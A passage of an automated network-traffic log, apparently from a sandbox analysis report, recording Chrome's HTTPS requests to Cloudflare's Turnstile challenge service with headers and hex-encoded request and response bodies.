                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:13 UTC143INHTTP/1.1 401 Unauthorized
                                                                                        Date: Fri, 01 Nov 2024 12:46:13 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 1
                                                                                        Connection: close
                                                                                        2024-11-01 12:46:13 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 72 4c 74 54 34 68 69 75 78 4b 41 32 70 59 5a 33 65 64 35 4a 46 4b 63 4e 51 79 47 69 53 2d 64 63 41 51 45 52 43 6a 4e 61 73 57 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20grLtT4hiuxKA2pYZ3ed5JFKcNQyGiS-dcAQERCjNasWYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                        2024-11-01 12:46:13 UTC1INData Raw: 4a
                                                                                        Data Ascii: J


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.449767104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:14 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8dbbfc65ff9e6b31/1730465170459/bzBIJqatPd8Kn9g HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:14 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:14 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc8c5ce11443-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 23 08 02 00 00 00 ed dd 38 d7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRd#8IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.449768104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:15 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 31979
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:15 UTC16384OUTData Raw: 76 5f 38 64 62 62 66 63 36 35 66 66 39 65 36 62 33 31 3d 41 6a 55 39 62 63 4f 56 6d 57 6d 4e 6d 4f 25 32 62 4f 65 7a 77 7a 4c 52 64 4f 68 7a 45 39 2d 68 32 46 51 4f 58 7a 4e 71 32 64 51 7a 42 7a 2d 67 42 32 35 56 4f 2d 42 51 7a 69 58 7a 4f 45 4f 52 7a 73 74 32 6d 7a 69 68 7a 64 50 45 7a 54 4a 30 39 7a 72 39 69 51 7a 65 39 74 6e 32 32 2b 66 7a 64 57 7a 63 6e 67 2b 4f 67 57 69 39 37 38 7a 77 49 39 46 5a 7a 53 6e 6e 72 73 73 30 33 55 46 43 7a 76 6e 6e 58 58 51 7a 41 31 56 45 33 7a 73 30 7a 70 7a 7a 45 31 7a 64 6c 2d 70 6e 74 7a 42 43 51 32 39 4f 57 39 44 61 63 6d 78 6e 74 32 4a 44 46 4d 4e 70 64 7a 30 44 6e 35 68 51 6a 7a 46 38 51 7a 4f 4a 76 47 4c 64 4e 50 7a 46 41 78 50 38 79 57 62 58 36 50 39 6d 4f 41 2b 33 4e 45 76 31 78 72 58 78 6b 56 77 4f 4b 6e 31 6d
                                                                                        Data Ascii: v_8dbbfc65ff9e6b31=AjU9bcOVmWmNmO%2bOezwzLRdOhzE9-h2FQOXzNq2dQzBz-gB25VO-BQziXzOEORzst2mzihzdPEzTJ09zr9iQze9tn22+fzdWzcng+OgWi978zwI9FZzSnnrss03UFCzvnnXXQzA1VE3zs0zpzzE1zdl-pntzBCQ29OW9Dacmxnt2JDFMNpdz0Dn5hQjzF8QzOJvGLdNPzFAxP8yWbX6P9mOA+3NEv1xrXxkVwOKn1m
                                                                                        2024-11-01 12:46:15 UTC15595OUTData Raw: 32 64 68 46 55 39 7a 7a 33 58 74 4f 32 63 36 7a 71 74 63 34 63 50 4e 7a 4f 49 46 66 7a 64 6a 46 67 63 33 55 50 6e 52 39 4f 33 48 35 4d 62 65 63 75 7a 31 66 55 39 63 6d 7a 73 30 4c 49 42 47 39 45 39 61 6a 4f 4a 32 33 7a 35 7a 63 63 7a 53 55 4f 30 7a 7a 4f 33 39 63 74 4f 6b 32 47 7a 7a 55 46 75 7a 55 7a 69 55 63 72 69 63 39 64 6d 63 30 7a 77 56 41 6d 46 4e 7a 34 6d 69 7a 4f 69 7a 31 39 42 30 46 5a 7a 35 7a 52 56 46 69 7a 38 7a 69 30 4f 5a 48 2b 7a 63 7a 35 34 7a 35 7a 4f 43 58 35 57 35 74 57 7a 69 4c 65 5a 7a 52 55 6b 78 7a 73 7a 4c 74 46 75 7a 59 7a 70 74 35 49 43 58 32 41 57 63 4f 7a 46 7a 57 55 69 50 4f 4b 7a 59 64 7a 4c 2b 33 7a 52 62 37 38 74 31 39 4f 54 32 6a 7a 50 39 61 55 7a 74 7a 50 6a 64 6d 69 6e 4f 67 39 7a 6c 38 69 57 33 39 46 67 4f 2b 4f 59 76
                                                                                        Data Ascii: 2dhFU9zz3XtO2c6zqtc4cPNzOIFfzdjFgc3UPnR9O3H5Mbecuz1fU9cmzs0LIBG9E9ajOJ23z5zcczSUO0zzO39ctOk2GzzUFuzUziUcric9dmc0zwVAmFNz4mizOiz19B0FZz5zRVFiz8zi0OZH+zcz54z5zOCX5W5tWziLeZzRUkxzszLtFuzYzpt5ICX2AWcOzFzWUiPOKzYdzL+3zRb78t19OT2jzP9aUztzPjdminOg9zl8iW39FgO+OYv
                                                                                        2024-11-01 12:46:16 UTC330INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:15 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 26316
                                                                                        Connection: close
                                                                                        cf-chl-gen: MynYnPDsNOxc+LZ+HnwJ87qhbDbgzJZX0dXCZiPqf+LOlHairXPQS8P66YUBRzAzZ+Uj9lqiwTB5Hr0V$F3DFBwbj6ezYzptq
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc947cdce52c-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:16 UTC1039INData Raw: 68 6f 53 4e 6d 57 32 61 61 58 6c 5a 6a 46 69 44 59 32 39 37 6f 57 42 36 6c 57 71 55 65 34 74 75 6d 48 39 79 72 4b 47 44 74 5a 61 55 64 58 43 47 6b 34 79 51 72 62 79 41 6b 5a 48 44 72 38 57 42 6c 59 62 4c 79 5a 72 4d 70 72 32 69 77 4b 4b 37 6f 61 2f 54 7a 4a 6a 50 32 61 65 6b 79 72 6d 64 71 64 50 4d 6f 2b 57 74 77 75 48 43 32 75 43 6d 33 62 58 61 72 73 76 42 30 4f 2f 78 79 66 4c 53 77 37 54 6d 75 64 66 4e 30 4f 33 30 30 72 76 2b 39 38 33 44 31 67 58 37 43 2b 48 44 34 41 6a 69 43 63 2f 36 46 42 45 50 38 65 6b 5a 31 41 6a 6b 39 2b 33 34 2f 42 7a 30 48 2b 41 64 38 76 59 68 2b 68 7a 38 49 77 6b 62 4c 68 76 69 4c 41 37 78 4d 7a 41 57 42 53 73 53 4c 41 59 70 44 66 41 49 4c 43 45 55 2b 53 59 41 51 67 55 34 48 6b 67 73 4f 54 6b 37 54 6b 38 49 53 53 6b 68 43 45 73
                                                                                        Data Ascii: hoSNmW2aaXlZjFiDY297oWB6lWqUe4tumH9yrKGDtZaUdXCGk4yQrbyAkZHDr8WBlYbLyZrMpr2iwKK7oa/TzJjP2aekyrmdqdPMo+WtwuHC2uCm3bXarsvB0O/xyfLSw7TmudfN0O300rv+983D1gX7C+HD4AjiCc/6FBEP8ekZ1Ajk9+34/Bz0H+Ad8vYh+hz8IwkbLhviLA7xMzAWBSsSLAYpDfAILCEU+SYAQgU4HkgsOTk7Tk8ISSkhCEs
                                                                                        2024-11-01 12:46:16 UTC1369INData Raw: 7a 70 4b 57 6d 71 6e 4f 5a 6d 6d 52 76 6e 6f 2b 66 70 49 53 4d 6b 6f 47 70 67 62 61 49 6c 36 6d 73 6c 33 36 53 6f 4c 4f 52 6e 37 62 43 73 4c 71 48 69 4c 71 59 6f 4d 4f 51 6e 4d 71 64 71 61 72 58 6f 70 57 72 6b 38 2f 54 32 74 57 2f 30 63 71 34 72 35 72 50 33 75 61 66 6e 38 62 59 72 4b 79 6b 78 2b 62 71 33 65 48 6b 36 63 69 2f 79 39 72 76 32 37 57 32 31 2b 2f 4c 77 50 66 76 76 37 76 31 76 65 54 30 30 67 49 4d 33 65 7a 6f 45 4f 6b 44 37 39 30 53 43 4f 62 53 37 50 6a 4e 47 68 67 57 46 68 6f 44 2b 4f 76 63 45 2f 6a 34 34 39 73 48 41 2b 54 66 35 41 4d 79 35 78 38 69 45 42 55 51 41 51 67 78 42 68 59 70 45 41 38 70 4c 42 55 5a 49 7a 55 77 51 78 46 41 46 79 6f 4a 50 53 6b 61 55 51 38 45 53 52 34 73 51 77 6c 49 54 45 6b 55 4a 53 6c 63 59 46 59 39 53 6a 5a 6b 57 31
                                                                                        Data Ascii: zpKWmqnOZmmRvno+fpISMkoGpgbaIl6msl36SoLORn7bCsLqHiLqYoMOQnMqdqarXopWrk8/T2tW/0cq4r5rP3uafn8bYrKykx+bq3eHk6ci/y9rv27W21+/LwPfvv7v1veT00gIM3ezoEOkD790SCObS7PjNGhgWFhoD+OvcE/j449sHA+Tf5AMy5x8iEBUQAQgxBhYpEA8pLBUZIzUwQxFAFyoJPSkaUQ8ESR4sQwlITEkUJSlcYFY9SjZkW1
                                                                                        2024-11-01 12:46:16 UTC1369INData Raw: 66 49 78 74 59 71 32 66 62 4c 47 45 74 57 2b 50 68 59 71 6d 6d 72 71 63 6a 34 6d 4a 6b 59 4e 36 6a 61 61 59 79 49 4b 79 78 35 32 6c 77 4d 57 78 7a 39 43 30 6b 4b 65 33 7a 4a 53 57 79 39 65 75 72 4a 6a 48 72 64 4b 59 6e 62 44 54 32 39 57 2b 74 71 44 71 77 37 2f 4a 79 4f 62 41 34 71 79 78 7a 4c 2f 33 7a 4d 7a 58 75 76 62 31 78 75 76 61 41 76 43 36 42 65 58 77 32 39 58 68 38 2b 73 41 36 67 4c 6b 35 41 44 6c 37 41 66 78 7a 41 6e 75 46 76 51 55 2f 66 6e 36 47 50 62 63 45 50 45 56 38 51 55 41 41 2f 49 6c 2f 65 54 2b 48 77 30 53 43 69 6b 56 42 68 41 6c 4c 66 55 69 4a 7a 49 6e 44 43 33 39 43 7a 30 64 4a 50 77 6b 49 78 6f 59 47 43 6c 44 4e 53 77 39 52 7a 31 51 54 44 42 4a 4d 42 56 45 52 53 6b 72 4a 54 4e 52 50 56 59 70 57 56 6f 61 58 6a 73 6b 5a 44 78 55 4b 57 31
                                                                                        Data Ascii: fIxtYq2fbLGEtW+PhYqmmrqcj4mJkYN6jaaYyIKyx52lwMWxz9C0kKe3zJSWy9eurJjHrdKYnbDT29W+tqDqw7/JyObA4qyxzL/3zMzXuvb1xuvaAvC6BeXw29Xh8+sA6gLk5ADl7AfxzAnuFvQU/fn6GPbcEPEV8QUAA/Il/eT+Hw0SCikVBhAlLfUiJzInDC39Cz0dJPwkIxoYGClDNSw9Rz1QTDBJMBVERSkrJTNRPVYpWVoaXjskZDxUKW1
                                                                                        2024-11-01 12:46:16 UTC1369INData Raw: 61 32 64 6e 71 74 71 72 4b 71 51 74 6e 71 61 68 35 71 63 6d 37 74 2b 74 71 2b 44 66 37 57 70 69 59 4f 4b 75 38 53 4c 6f 4d 2f 51 6a 5a 32 74 78 4a 54 55 6f 35 4b 35 71 38 2b 39 33 74 54 57 32 4b 4c 58 35 65 69 69 30 39 72 6b 77 72 33 4a 76 64 2f 4e 33 4d 58 7a 34 75 75 74 37 76 6a 54 78 62 4c 7a 31 37 37 39 36 72 71 35 38 67 50 44 35 62 72 55 36 76 50 48 33 63 72 4c 37 77 49 43 78 65 2f 30 37 41 73 4b 36 64 44 32 2b 39 33 77 44 4f 72 62 4a 42 54 34 44 77 4c 2b 41 52 4d 57 41 51 6b 74 2b 69 4d 4d 41 2b 51 4d 4a 2f 54 31 37 52 51 6c 42 69 38 6d 4d 42 34 77 45 67 33 39 41 44 73 7a 44 78 67 46 47 69 6b 6b 54 43 59 2f 4a 52 74 44 45 42 49 74 49 53 6c 4d 56 43 56 54 44 68 4d 6d 56 7a 6f 71 4f 57 52 56 5a 54 67 67 58 47 42 6e 59 6b 78 65 56 30 56 71 61 30 39 68
                                                                                        Data Ascii: a2dnqtqrKqQtnqah5qcm7t+tq+Df7WpiYOKu8SLoM/QjZ2txJTUo5K5q8+93tTW2KLX5eii09rkwr3Jvd/N3MXz4uut7vjTxbLz17796rq58gPD5brU6vPH3crL7wICxe/07AsK6dD2+93wDOrbJBT4DwL+ARMWAQkt+iMMA+QMJ/T17RQlBi8mMB4wEg39ADszDxgFGikkTCY/JRtDEBItISlMVCVTDhMmVzoqOWRVZTggXGBnYkxeV0Vqa09h
                                                                                        2024-11-01 12:46:16 UTC1369INData Raw: 79 34 74 70 43 51 76 61 32 51 6a 4a 2b 55 70 4a 57 62 70 5a 2f 47 6e 36 79 6a 75 70 79 64 76 62 48 4a 79 38 6e 4a 30 4b 6e 4e 30 74 4c 55 6c 74 54 56 30 4e 6a 4b 72 73 4c 58 6f 74 33 43 73 73 58 6a 31 4e 33 63 75 4b 65 36 79 65 76 74 72 50 48 31 37 62 6a 4c 38 2f 79 36 38 4c 37 61 2f 73 2f 37 76 4f 37 6e 77 4f 6b 42 41 4d 58 31 34 64 66 36 33 4f 44 51 38 4f 33 68 7a 78 4d 55 46 75 37 6b 36 65 6a 33 44 2f 44 64 44 52 44 64 37 69 4d 58 34 76 59 54 47 4f 51 6c 43 67 37 72 47 67 6b 55 46 41 63 6d 4b 68 67 70 4d 68 6a 30 39 54 45 67 4e 43 4d 43 4a 54 6b 6a 42 43 59 5a 4e 68 73 71 4c 51 70 4f 50 79 35 42 50 54 51 7a 51 52 52 48 4a 6c 45 61 4f 69 73 6f 4b 6b 70 41 59 6a 4a 4d 51 79 4a 62 56 44 63 33 59 45 6f 36 53 44 74 4f 5a 30 41 39 56 56 49 79 62 56 5a 58 62
                                                                                        Data Ascii: y4tpCQva2QjJ+UpJWbpZ/Gn6yjupydvbHJy8nJ0KnN0tLUltTV0NjKrsLXot3CssXj1N3cuKe6yevtrPH17bjL8/y68L7a/s/7vO7nwOkBAMX14df63ODQ8O3hzxMUFu7k6ej3D/DdDRDd7iMX4vYTGOQlCg7rGgkUFAcmKhgpMhj09TEgNCMCJTkjBCYZNhsqLQpOPy5BPTQzQRRHJlEaOisoKkpAYjJMQyJbVDc3YEo6SDtOZ0A9VVIybVZXb
                                                                                        2024-11-01 12:46:16 UTC1369INData Raw: 57 66 72 53 36 66 70 4b 69 71 4b 61 47 76 4a 7a 45 78 4d 43 4c 73 6f 36 37 70 4e 57 68 78 63 71 5a 6b 4c 62 4f 71 72 57 30 30 64 4f 5a 75 5a 36 6c 73 38 44 44 32 36 53 2f 37 61 79 75 33 50 48 77 71 73 2b 2f 37 4e 62 68 73 75 33 51 37 4e 7a 57 30 2b 37 66 39 64 62 7a 2b 50 58 64 39 76 33 38 41 66 7a 63 34 39 6a 71 79 74 44 53 36 75 2f 79 36 2b 7a 33 46 4e 50 79 44 68 48 30 39 2f 7a 68 32 67 44 76 48 51 63 53 34 68 34 42 48 51 30 48 42 42 38 51 4a 67 63 6b 4b 53 59 4f 4a 79 34 74 4d 53 30 4e 46 41 6b 62 51 6a 54 2b 47 50 76 38 41 78 30 2b 52 51 45 6a 4b 41 55 49 4a 69 30 4a 44 43 6c 48 45 69 70 44 4e 69 49 59 4f 69 77 7a 47 31 46 58 47 79 38 2f 52 55 4d 6a 57 54 6c 68 59 56 30 6f 54 79 74 59 51 58 49 2b 59 6d 63 32 4c 55 39 55 4d 54 4e 56 57 46 6f 36 62 49
                                                                                        Data Ascii: WfrS6fpKiqKaGvJzExMCLso67pNWhxcqZkLbOqrW00dOZuZ6ls8DD26S/7ayu3PHwqs+/7Nbhsu3Q7NzW0+7f9dbz+PXd9v38Afzc49jqytDS6u/y6+z3FNPyDhH09/zh2gDvHQcS4h4BHQ0HBB8QJgckKSYOJy4tMS0NFAkbQjT+GPv8Ax0+RQEjKAUIJi0JDClHEipDNiIYOiwzG1FXGy8/RUMjWTlhYV0oTytYQXI+Ymc2LU9UMTNVWFo6bI
                                                                                        2024-11-01 12:46:16 UTC1369INData Raw: 79 61 6d 43 6f 72 32 64 68 36 62 52 76 34 6d 6f 31 63 43 70 72 4d 6d 55 6b 4c 43 33 75 5a 61 30 30 63 76 69 75 4e 62 66 6f 72 7a 5a 77 61 48 41 37 64 2b 6d 78 62 76 42 72 4d 33 31 35 2f 66 4c 36 64 57 73 7a 2b 33 5a 75 4e 58 4c 32 74 58 5a 33 39 33 42 33 41 72 64 77 4e 2f 39 79 4d 72 6b 41 77 7a 4f 36 68 59 49 30 4f 33 6a 42 4e 62 76 48 76 33 58 2b 53 49 51 33 76 63 57 34 4e 33 39 38 78 54 67 41 53 34 5a 41 67 62 37 49 44 51 49 4a 67 37 75 44 44 6f 53 38 52 45 76 4f 50 6b 55 4d 69 4c 36 47 55 59 69 52 78 39 4b 4b 67 49 6d 54 6a 77 48 4a 56 49 38 44 69 68 47 53 41 30 74 57 69 38 75 4d 46 35 49 45 54 52 69 4d 68 6f 35 56 69 45 68 50 31 74 6b 4a 30 45 34 50 6e 42 47 54 47 41 75 53 48 5a 4c 53 6b 78 36 61 44 56 53 57 48 41 32 56 55 78 77 68 46 36 47 56 6b 46
                                                                                        Data Ascii: yamCor2dh6bRv4mo1cCprMmUkLC3uZa00cviuNbforzZwaHA7d+mxbvBrM315/fL6dWsz+3ZuNXL2tXZ393B3ArdwN/9yMrkAwzO6hYI0O3jBNbvHv3X+SIQ3vcW4N398xTgAS4ZAgb7IDQIJg7uDDoS8REvOPkUMiL6GUYiRx9KKgImTjwHJVI8DihGSA0tWi8uMF5IETRiMho5ViEhP1tkJ0E4PnBGTGAuSHZLSkx6aDVSWHA2VUxwhF6GVkF
                                                                                        2024-11-01 12:46:16 UTC1369INData Raw: 71 72 43 7a 4d 32 70 79 4b 36 70 77 4c 50 51 6c 62 61 56 6c 62 47 31 76 4a 33 4e 7a 37 43 6c 34 63 48 70 79 61 58 47 33 36 57 70 79 71 6d 70 78 63 6e 50 36 4d 7a 52 73 4f 4f 33 35 39 69 39 2b 64 6d 35 77 63 2f 6b 30 62 33 34 34 4f 62 46 39 66 54 44 36 67 76 71 41 77 30 4f 36 51 6b 4e 36 51 41 4b 45 52 54 31 31 52 6a 62 43 75 77 64 49 66 6b 61 47 66 30 53 42 53 55 6c 42 78 38 70 4c 67 59 6c 37 51 59 64 4a 69 30 30 45 76 48 34 39 78 30 4a 4f 54 45 57 4e 6a 55 61 4c 52 46 42 4a 69 4d 2b 51 55 45 73 47 44 6b 33 4a 6b 5a 46 4b 6a 55 68 55 55 30 34 4a 45 56 44 4e 30 39 5a 56 55 41 73 51 30 73 36 57 6c 6b 2b 55 53 42 6c 59 55 77 34 54 31 64 4c 59 32 31 70 56 45 42 70 58 30 35 75 62 56 4a 6c 62 33 6c 31 59 45 78 31 61 31 39 33 67 58 31 6f 56 48 6c 7a 59 6f 4b 42
                                                                                        Data Ascii: qrCzM2pyK6pwLPQlbaVlbG1vJ3Nz7Cl4cHpyaXG36WpyqmpxcnP6MzRsOO359i9+dm5wc/k0b344ObF9fTD6gvqAw0O6QkN6QAKERT11RjbCuwdIfkaGf0SBSUlBx8pLgYl7QYdJi00EvH49x0JOTEWNjUaLRFBJiM+QUEsGDk3JkZFKjUhUU04JEVDN09ZVUAsQ0s6Wlk+USBlYUw4T1dLY21pVEBpX05ubVJlb3l1YEx1a193gX1oVHlzYoKB


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.449769104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:15 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8dbbfc65ff9e6b31/1730465170459/bzBIJqatPd8Kn9g HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:15 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:15 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc95890c466b-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:15 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 23 08 02 00 00 00 ed dd 38 d7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRd#8IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.449770104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:16 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:16 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 12:46:16 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: R0dvhmkDom5/nPjp/lwvo9Th80kJlFuIrAE=$Q/4vFoM2vWMp4UIf
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc9b3fc46c76-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:16 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.449771104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:24 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 34349
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
